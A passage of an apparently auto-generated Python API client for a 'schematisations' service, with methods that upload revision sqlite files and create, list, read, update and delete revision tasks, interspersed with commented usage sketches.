timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Upload, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_sqlite_upload" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_sqlite_upload`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/sqlite/upload/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Upload', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
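# Usage sketch: the docstring above notes that an optional md5sum of the
# compressed sqlite file enables de-duplication. The exact fields of
# `SqliteFileUpload` are not defined in this file; `filename` and `md5sum`
# below are assumptions.
#
#     import hashlib
#     with open("model.sqlite.zip", "rb") as f:
#         digest = hashlib.md5(f.read()).hexdigest()
#     data = SqliteFileUpload(filename="model.sqlite.zip",
#                             md5sum=digest)  # assumed fields
#     upload = api.schematisations_revisions_sqlite_upload(
#         revision_id, schematisation_id, data)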
def schematisations_revisions_tasks_create(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_create # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_create(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_create_with_http_info(revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_create_with_http_info(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_create # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_create_with_http_info(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_create`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
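# Behaviour sketch: unexpected keyword arguments are rejected locally with
# `ApiTypeError` instead of being forwarded to the server.
#
#     api.schematisations_revisions_tasks_create(
#         revision_id, schematisation_id, data, no_such_kwarg=1)
#     # -> ApiTypeError: Got an unexpected keyword argument 'no_such_kwarg'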
def schematisations_revisions_tasks_delete(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_delete # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_delete(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_delete_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_delete_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_delete # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_delete_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding the response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
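# Usage sketch (illustrative only): deleting a single revision task. Assumes
# `api` is an authenticated instance of this generated API class; the ids
# below are hypothetical.
#
#   api.schematisations_revisions_tasks_delete(
#       id=42, revision_pk="7", schematisation_pk="3")
#
#   # Or fire-and-collect asynchronously:
#   thread = api.schematisations_revisions_tasks_delete(
#       id=42, revision_pk="7", schematisation_pk="3", async_req=True)
#   thread.get()  # returns None on success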
def schematisations_revisions_tasks_list(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_list # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_list(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_list_with_http_info(revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_list_with_http_info(self, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_list # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_list_with_http_info(revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2003, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_list`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
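# Usage sketch (illustrative only): paging through revision tasks. Assumes
# `api` is an authenticated instance of this generated API class; the
# `results` attribute on the paginated InlineResponse2003 is an assumption
# based on the usual generated limit/offset pagination models.
#
#   page = api.schematisations_revisions_tasks_list(
#       revision_pk="7", schematisation_pk="3", limit=50, offset=0)
#   for task in page.results:
#       print(task)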
def schematisations_revisions_tasks_partial_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_partial_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_partial_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_partial_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_partial_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_partial_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
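# Usage sketch (illustrative only): PATCHing a revision task. The
# RevisionTask constructor field shown is hypothetical; consult the
# generated RevisionTask model for the real field names.
#
#   body = RevisionTask(status="archived")  # hypothetical field
#   task = api.schematisations_revisions_tasks_partial_update(
#       id=42, revision_pk="7", schematisation_pk="3", data=body)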
def schematisations_revisions_tasks_read(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_read # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_read(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_read_with_http_info(id, revision_pk, schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_tasks_read_with_http_info(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_read # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_read_with_http_info(id, revision_pk, schematisation_pk, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_read`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_read`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
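# Usage sketch (illustrative only): fetching a single revision task,
# synchronously or via async_req. Ids are hypothetical.
#
#   task = api.schematisations_revisions_tasks_read(
#       id=42, revision_pk="7", schematisation_pk="3")
#
#   thread = api.schematisations_revisions_tasks_read(
#       id=42, revision_pk="7", schematisation_pk="3", async_req=True)
#   task = thread.get()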
def schematisations_revisions_tasks_update(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_update(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_tasks_update_with_http_info(id, revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_tasks_update_with_http_info(self, id, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_tasks_update # noqa: E501
View revision tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_tasks_update_with_http_info(id, revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param bool async_req: execute request asynchronously
:param int id: A unique integer value identifying this revision task. (required)
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RevisionTask data: (required)
:param _return_http_data_only: return the response data only, without
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_tasks_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_tasks_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_tasks_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/tasks/{id}/', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
